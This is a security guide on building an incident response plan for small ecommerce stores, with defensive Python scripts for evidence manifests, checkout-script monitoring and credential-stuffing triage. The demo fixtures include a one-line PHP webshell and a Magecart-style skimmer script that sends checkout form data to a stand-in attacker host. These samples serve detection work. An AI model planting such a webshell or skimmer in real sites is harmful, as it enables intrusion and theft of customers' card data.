Security Incident Response Plan for Ecommerce: Prepare and Respond
Before You Start
The worst time to create an incident response plan is during an active incident. Store owners who discover a breach without a plan waste critical hours deciding what to do, who to call, and what steps to take while the attacker keeps extracting data. Breach cost studies consistently find that the breach lifecycle (the time from initial compromise through identification to containment) is one of the strongest predictors of total cost. IBM's Cost of a Data Breach Report found that breaches identified and contained within 200 days cost an average of $3.93 million, while those that took longer than 200 days cost $4.95 million, a gap IBM puts at 23%. Both halves of that lifecycle are under your control: how quickly you notice, and how quickly you contain once you have noticed.
Your incident response plan does not need to be a 50-page document. For a small ecommerce store, a 2 to 3 page document covering your response team, emergency contacts, containment steps, and notification procedures is sufficient. The goal is having a clear, actionable reference that anyone on your team can follow when a crisis strikes, not creating a comprehensive security manual.
Step-by-Step Plan Creation
For a small ecommerce business, your "team" may be just you and one or two key contacts. The essential roles are: Incident Commander (you, the business owner, who decides whether to take the store offline, approves spending on forensic investigation, and authorizes customer communications), Technical Lead (the person who performs hands-on investigation and remediation, which may be you, your developer, or your hosting provider's support team), and Communications Lead (the person who handles customer notification, social media responses, and regulatory communications, which for small businesses is usually the owner). Write down who holds each role and who covers for them if they are unreachable.
Build an emergency contact list that includes: your hosting provider's emergency support line (not the general support number), your payment processor's fraud or security team direct contact, a digital forensics firm that you have pre-vetted (get their engagement terms and rates before you need them, not during a crisis), a lawyer who handles data breach and privacy law (know their name and number in advance), your cyber insurance provider's claims line (if you have a policy, note any requirement to notify them before engaging outside help), and law enforcement contacts (IC3.gov for the FBI's Internet Crime Complaint Center, and your local police department's cybercrime unit).
Store this contact list printed in a physical location and digitally in a secure document accessible from a device other than your primary computer, in case your primary device is compromised.
You cannot respond to a breach you do not know about, and many ecommerce breaches go undetected for weeks or months. The average time to identify a breach is 204 days according to IBM's research, and every additional day of undetected compromise increases the damage. Set up multiple detection layers: Security plugin or website monitoring alerts from Wordfence, Sucuri, or MalCare that notify you of file changes, malware detections, brute force attacks, and suspicious activity. Google Search Console notifications for security issues detected on your site. Uptime monitoring through UptimeRobot (free) that alerts you to unexpected downtime. Payment processor alerts from Stripe, PayPal, or your gateway that notify you of unusual transaction patterns, chargeback spikes, or account security concerns. Customer reports, by making it easy for customers to report security concerns through a visible contact method. Sometimes the first indication of a breach is a customer reporting that their account was used for unauthorized purchases or that they were redirected to an unfamiliar page. Configure all alerts to reach you via both email and SMS, so you are notified even if one channel is compromised or unavailable, and send them to a mailbox and phone that do not depend on the store's own server or its admin account: if the server is compromised, the attacker can read or suppress mail that passes through it.
When you detect a potential breach, containment is your immediate priority. The goal is to stop the attacker's access and prevent further data loss while preserving evidence for investigation. Document these containment steps for the most common ecommerce incident types.
For malware or a card skimmer detected: Put your store in maintenance mode immediately to prevent customer exposure, ideally at the hosting or web server level rather than through a plugin the attacker may control. Do not simply delete the malicious files, because the attacker likely has a backdoor that will reinfect within hours. Change all admin passwords from a clean device. Revoke all active admin sessions (on WordPress, rotating the authentication keys and salts in wp-config.php invalidates every existing login cookie). Contact your payment processor to inform them of the potential card data compromise.
For admin account compromise: Change the compromised account password immediately. Disable the account if possible. Review and revoke all active sessions. Check for new admin users the attacker may have created. Review recent file changes and plugin installations. Rotate any API keys and integration tokens (payment gateway, shipping, email) the account could reach. Enable or re-enable two-factor authentication.
For customer account takeover: Force password resets on affected accounts. Cancel unauthorized orders. Reverse unauthorized changes such as altered shipping addresses or saved payment details. Notify affected customers.
For ransomware: Disconnect the affected server from the network immediately, but leave it powered on where you can isolate it, since memory and running processes are evidence. Do not attempt to decrypt files yourself. Do not pay the ransom. Contact your forensics firm. Begin backup restoration planning.
After containment, you need to determine what happened, what data was affected, and how the attacker gained access. This information is necessary for fixing the vulnerability, fulfilling notification obligations, and potentially supporting law enforcement action. Preserve evidence before cleaning up: Make a complete image (copy) of the affected server or files before making any changes, and record a hash of everything you collect so you can later show it was not altered. Collect server access logs, application logs, database logs, and firewall logs covering at least the 90 days before the incident. If your host rotates logs after a few days, fix that now as a preparation task by extending retention or shipping logs off the server, because logs that live only on a compromised machine may already be trimmed or edited by the attacker; pull independent copies from your CDN, payment processor, and hosting control panel where they exist. Screenshot any evidence of the attack including unauthorized files, modified code, or suspicious admin accounts. Save email headers from any phishing messages that may have been the attack vector. Determine the scope: Identify when the compromise began by examining file modification timestamps and access logs (timestamps can be forged, so confirm them against log entries). Determine what data was potentially accessed or exfiltrated by reviewing database query logs and outbound network traffic. Identify how many customers are potentially affected. Determine whether payment card data was exposed, which triggers additional notification requirements. For significant breaches (payment data exposed, large customer databases compromised, or regulatory notification likely required), engage a professional digital forensics firm. Their investigation produces a formal report that documents the attack, its scope, and the evidence, which is essential for regulatory compliance, insurance claims, and legal proceedings. Attempting to investigate a major breach without professional expertise often destroys evidence and produces incomplete or inaccurate conclusions.
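The file-change detection layer described earlier and the evidence preservation steps above rest on the same mechanism: a manifest of every file's hash and modification time, taken once on a known-clean store and again before any cleanup. The script below is an added example written for this page, not code from the article or from any security plugin. It assumes the web root (or a copy of it taken from the server image) is on local disk; the directory layout, the dropped webshell and the skimmer tag in the demo are constructed for illustration.

```python
"""Hashed evidence manifest plus change timeline for a store's web root.

Added example, not code from the article. It assumes the files are on local
disk (the live server, or better, a copy taken from the server image). The
directory layout and attacker changes below are constructed for the demo.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash in 1 MiB chunks so large logs and database dumps need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Record hash, size and mtime (UTC) of every regular file under root.

    Taken on a known-clean store it is the baseline for file-change detection;
    taken before any cleanup it fixes what the attacker left behind.
    """
    files = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            st = p.stat()
            files[str(p.relative_to(root))] = {
                "sha256": sha256_file(p),
                "size": st.st_size,
                "mtime": datetime.fromtimestamp(st.st_mtime, tz=timezone.utc).isoformat(),
            }
    return {"taken_at": datetime.now(timezone.utc).isoformat(), "files": files}


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Paths added, removed, or whose content hash changed since the baseline."""
    b, c = baseline["files"], current["files"]
    return {
        "added": sorted(set(c) - set(b)),
        "removed": sorted(set(b) - set(c)),
        "modified": sorted(k for k in set(b) & set(c) if b[k]["sha256"] != c[k]["sha256"]),
    }


def modified_since(manifest: dict, since: datetime) -> list:
    """Paths with an mtime at or after a suspected compromise time, oldest first.

    mtimes are trivially forged (touch -r), so treat this as a lead to confirm
    against access logs, not as proof of when the compromise began.
    """
    rows = [(v["mtime"], k) for k, v in manifest["files"].items()
            if datetime.fromisoformat(v["mtime"]) >= since]
    return [k for _, k in sorted(rows)]


def demo() -> dict:
    """Constructed scenario: clean baseline, then a dropped webshell and an
    edited checkout template. Returns the diff, the timeline and the manifest hash."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        theme = root / "wp-content" / "themes" / "shop"
        theme.mkdir(parents=True)
        checkout = theme / "checkout.php"
        checkout.write_text("<?php // clean checkout template ?>\n")
        (root / "wp-config.php").write_text("<?php define('DB_NAME', 'shop'); ?>\n")
        old = datetime(2024, 1, 1, tzinfo=timezone.utc).timestamp()
        for p in (checkout, root / "wp-config.php"):
            os.utime(p, (old, old))          # backdate the clean files
        baseline = build_manifest(root)

        # Attacker activity (constructed): webshell in uploads, skimmer tag in checkout.
        (root / "wp-content" / "uploads").mkdir()
        (root / "wp-content" / "uploads" / "cache.php").write_text("<?php eval($_POST['c']); ?>\n")
        checkout.write_text('<?php // clean checkout template ?>\n'
                            '<script src="https://cdn.example-bad.test/s.js"></script>\n')

        current = build_manifest(root)
        manifest_json = json.dumps(current, indent=2, sort_keys=True)
        return {
            "changes": diff_manifests(baseline, current),
            "timeline": modified_since(current, datetime(2024, 6, 1, tzinfo=timezone.utc)),
            # Hash of the manifest itself: record it in your notes so the
            # evidence set can later be shown to be unaltered.
            "manifest_sha256": hashlib.sha256(manifest_json.encode()).hexdigest(),
        }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run the baseline manifest on a clean deploy and keep it off the server; during an incident, run it again on the copy you imaged, write the JSON next to the evidence, and note its hash in your incident log before anyone starts cleaning. The diff tells you what to look at; the timeline only tells you where to start looking in the access logs.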
Prepare notification materials before you need them. Having templates ready allows you to respond quickly during an incident rather than drafting communications under stress. The customer notification template should include: a clear description of what happened (without technical jargon), what personal data was potentially affected, what you are doing about it, what the customer should do (change their password, monitor their credit card statements, etc.), and how to contact you with questions. Use plain language and do not minimize the incident; customers respond better to honest, transparent communication than to corporate hedging. The regulatory notification template for GDPR (72 hours from becoming aware of the breach) and applicable state breach notification laws should include: the nature of the breach, categories of data affected, approximate number of individuals affected, likely consequences, and measures taken to address the breach. Payment processor notification should be immediate if payment card data was potentially compromised, and should include the timeframe of the potential exposure and the number of potentially affected transactions.
Recovery procedures should document step by step how to restore your store from backups, close the vulnerability that was exploited, verify the restored store is clean, and bring the store back online. Test these recovery procedures before you need them by performing a practice restoration in a staging environment, and time it: that number is what you will be quoting to customers and your processor during a real outage.
Common Ecommerce Incident Scenarios
Scenario 1: Magecart card skimmer detected. A checkout page monitoring tool or customer report reveals that a malicious script is capturing card data on your checkout page. Response: immediately put the store in maintenance mode, capture a copy of the checkout page and the skimmer script before removing anything (the investigators and the card brands will want the original), contact your payment processor's security team, engage a forensics firm to determine when the skimmer was installed (this defines the window of affected transactions), prepare customer notifications for all customers who completed checkout during the compromise window, and file a report with your card brands through your payment processor. The card brands may require you to hire a PCI Forensic Investigator (PFI) for a formal investigation.
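The "checkout page monitoring tool" in this scenario, and the detection layers listed under plan creation, can be as simple as fetching your own checkout page on a schedule and diffing the scripts it loads against a baseline. Below is an added example of that check, written for this page and not taken from the article or from any monitoring product. The allowlisted hosts, the clean and skimmed pages, and the look-alike CDN domain are all constructed so the demo runs offline; the real version would fetch the live page over HTTPS and alert on any non-empty result.

```python
"""Checkout-page script allowlist monitor (Magecart-style skimmer detection).

Added example, not code from the article or from any monitoring product. It
assumes you periodically fetch your own checkout page (the pages below are
constructed so the demo runs offline) and keep an allowlist of script hosts
plus hashes of the inline scripts seen on a known-good page.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hosts your checkout legitimately loads scripts from (assumed for the example).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "js.stripe.com"}


class ScriptCollector(HTMLParser):
    """Collect external script src values and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def inline_hash(body: str) -> str:
    return hashlib.sha256(body.encode()).hexdigest()


def known_inline_hashes(html: str) -> set:
    """Baseline: hashes of every inline script on a page you have verified is clean."""
    c = ScriptCollector()
    c.feed(html)
    c.close()
    return {inline_hash(b) for b in c.inline if b}


def audit_checkout(html: str, page_url: str, allowed_hosts: set, known_inline: set) -> dict:
    """Scripts on the page that are neither from an allowed host nor a known inline body.

    Relative and protocol-relative srcs are resolved against page_url; anything
    that is not plain http(s) (data:, javascript:) is reported as unknown.
    """
    c = ScriptCollector()
    c.feed(html)
    c.close()
    unknown_external = []
    for src in c.external:
        u = urlparse(urljoin(page_url, src))
        if u.scheme not in ("http", "https") or u.hostname not in allowed_hosts:
            unknown_external.append(src)
    unknown_inline = [b[:80] for b in c.inline if b and inline_hash(b) not in known_inline]
    return {"unknown_external": unknown_external, "unknown_inline": unknown_inline}


# Constructed pages. The skimmed copy adds a look-alike CDN host and an inline
# hook that ships serialised form data on submit, the usual Magecart pattern.
CLEAN_PAGE = """<html><head>
<script src="https://js.stripe.com/v3/"></script>
<script src="/assets/checkout.js"></script>
<script>window.shopConfig = {currency: "USD"};</script>
</head><body><form id="checkout"></form></body></html>"""

SKIMMED_PAGE = CLEAN_PAGE.replace("</head>", """<script src="//cdn.jquery-analytics.test/jq.min.js"></script>
<script>document.addEventListener("submit",function(e){new Image().src="https://cdn.jquery-analytics.test/g?d="+btoa(JSON.stringify(Object.fromEntries(new FormData(e.target))))});</script>
</head>""")


def demo() -> dict:
    page_url = "https://shop.example/checkout/"
    known = known_inline_hashes(CLEAN_PAGE)
    return {
        "clean": audit_checkout(CLEAN_PAGE, page_url, ALLOWED_SCRIPT_HOSTS, known),
        "skimmed": audit_checkout(SKIMMED_PAGE, page_url, ALLOWED_SCRIPT_HOSTS, known),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Two caveats. A skimmer injected into a script already hosted on your own domain (a modified jquery.min.js, for example) passes the host allowlist; the file-hash manifest from the evidence section is the check that catches that, so run both. And a skimmer that is only served to real browsers (based on user agent or cookies) will not appear to a plain fetch, which is one reason a Content Security Policy on the checkout page, with violation reporting, is a stronger control than any scanner.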
Scenario 2: Ransomware encrypts your store. You discover your store is displaying an error or ransom message instead of your products. Response: disconnect the server from the network, contact your hosting provider, do not pay the ransom, assess your backup status to determine whether you have a clean restore point and confirm the backups themselves were not reachable from the compromised server (backups mounted on or writable from the store are routinely encrypted along with it), provision a clean server, restore from the most recent clean backup, change all credentials, close the vulnerability that allowed the ransomware in (typically an unpatched vulnerability or a compromised credential), bring the store back online, and verify data integrity. If customer data may have been exfiltrated before encryption, which is the norm for current ransomware crews, follow your breach notification procedures.
Scenario 3: Customer reports unauthorized account access. A customer contacts you saying purchases were made on their account that they did not authorize. Response: immediately secure the affected account by forcing a password reset and revoking all sessions, cancel any unfulfilled unauthorized orders, refund the customer for any unauthorized completed orders, and investigate whether this is an isolated account takeover or part of a broader credential stuffing attack by checking login logs for the same IP attempting many different accounts in a short window. Bear in mind that a distributed attack spreads attempts across many IPs, so also look for a site-wide spike in failed logins and for successful logins from an address an account has never used before. If multiple accounts are affected, force password resets for all potentially compromised accounts and notify affected customers.
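The log check in this scenario, worked through on sample data, as an added example that is not part of the original article. The log line format, the addresses (RFC 5737 documentation ranges) and the usernames are constructed; parse_line() is the only piece that needs changing to match whatever your store or web server actually writes, and behind a CDN or reverse proxy the IP you parse must be the real client address, not the proxy's.

```python
"""Credential-stuffing triage over login log lines.

Added example, not code from the article. The log format is constructed for the
demo (timestamp, client IP, result, username); adapt parse_line() to whatever
your store or web server actually writes, and make sure the IP you parse is the
real client address (X-Forwarded-For behind a CDN or proxy), not the proxy's.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) login (?P<result>OK|FAIL) user=(?P<user>\S+)$")

# Constructed sample using RFC 5737 documentation addresses: two ordinary
# customers, then one IP walking a leaked credential list and landing two hits.
SAMPLE_LOG = """\
2024-06-01T10:00:01Z 198.51.100.20 login OK user=alice
2024-06-01T10:00:05Z 198.51.100.21 login FAIL user=bob
2024-06-01T10:00:09Z 198.51.100.21 login OK user=bob
2024-06-01T10:01:00Z 203.0.113.5 login FAIL user=carol
2024-06-01T10:01:01Z 203.0.113.5 login FAIL user=dave
2024-06-01T10:01:02Z 203.0.113.5 login OK user=erin
2024-06-01T10:01:03Z 203.0.113.5 login FAIL user=frank
2024-06-01T10:01:04Z 203.0.113.5 login FAIL user=grace
2024-06-01T10:01:05Z 203.0.113.5 login OK user=heidi
2024-06-01T10:01:06Z 203.0.113.5 login FAIL user=ivan
2024-06-01T14:00:00Z 203.0.113.5 login FAIL user=judy
"""


def parse_line(line: str):
    """One log line -> dict, or None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return e


def parse_log(text: str) -> list:
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def find_stuffing(events: list, min_accounts: int = 5, window: timedelta = timedelta(minutes=10)) -> dict:
    """IPs that tried at least min_accounts distinct usernames inside any window.

    A single customer mistyping their password never touches many accounts, so
    distinct-accounts-per-IP separates stuffing from ordinary failed logins
    better than a raw failure count. Shared egress (offices, carrier-grade NAT)
    can still trip it, so review before blocking.
    """
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    suspects = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        for i, e in enumerate(evs):
            while e["ts"] - evs[start]["ts"] > window:   # slide the window forward
                start += 1
            best = max(best, len({x["user"] for x in evs[start:i + 1]}))
        if best >= min_accounts:
            suspects[ip] = {
                "max_accounts_in_window": best,
                "total_attempts": len(evs),
                # Any success from a stuffing IP is a takeover until proven otherwise.
                "compromised": sorted({x["user"] for x in evs if x["result"] == "OK"}),
            }
    return suspects


def accounts_to_reset(suspects: dict) -> list:
    """Union of accounts that need a forced password reset and session revocation."""
    return sorted({u for s in suspects.values() for u in s["compromised"]})


if __name__ == "__main__":
    found = find_stuffing(parse_log(SAMPLE_LOG))
    for ip, info in found.items():
        print(ip, info)
    print("reset:", accounts_to_reset(found))
```

On the sample, 203.0.113.5 touches seven distinct accounts inside one minute and gets into erin and heidi, so those two go on the forced-reset list even though their owners have not complained yet. The per-IP pivot misses an attacker who rotates through a proxy pool at one attempt per address; for that, complement this with the site-wide failed-login rate over time and with successes from an address an account has never logged in from before, which are the signals bot-management products key on.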
After the Incident
After the immediate crisis is resolved, conduct a post-incident review within one week while details are fresh. Document: how the incident was detected and by whom, the timeline from detection to containment to resolution, what worked well in the response, what could have been done faster or better, what the root cause was and how it was remediated, and what changes to your security posture will prevent recurrence. Update your incident response plan based on what you learned. If a detection gap allowed the breach to go unnoticed, add monitoring for that attack type. If containment took too long because of unclear procedures, document clearer steps. If notification was delayed because templates were not ready, prepare them now.
Consider whether the incident reveals a systemic security gap that requires investment. A card skimmer incident might indicate you need regular vulnerability scanning, a quarterly security audit, a Content Security Policy on the checkout page, and continuous monitoring of which scripts that page loads. A credential-stuffing attack might indicate you need bot detection and customer MFA. A ransomware incident almost certainly indicates you need offline or immutable backups and server hardening. Use the incident as a catalyst for security improvements rather than a problem to forget once the immediate crisis is over.
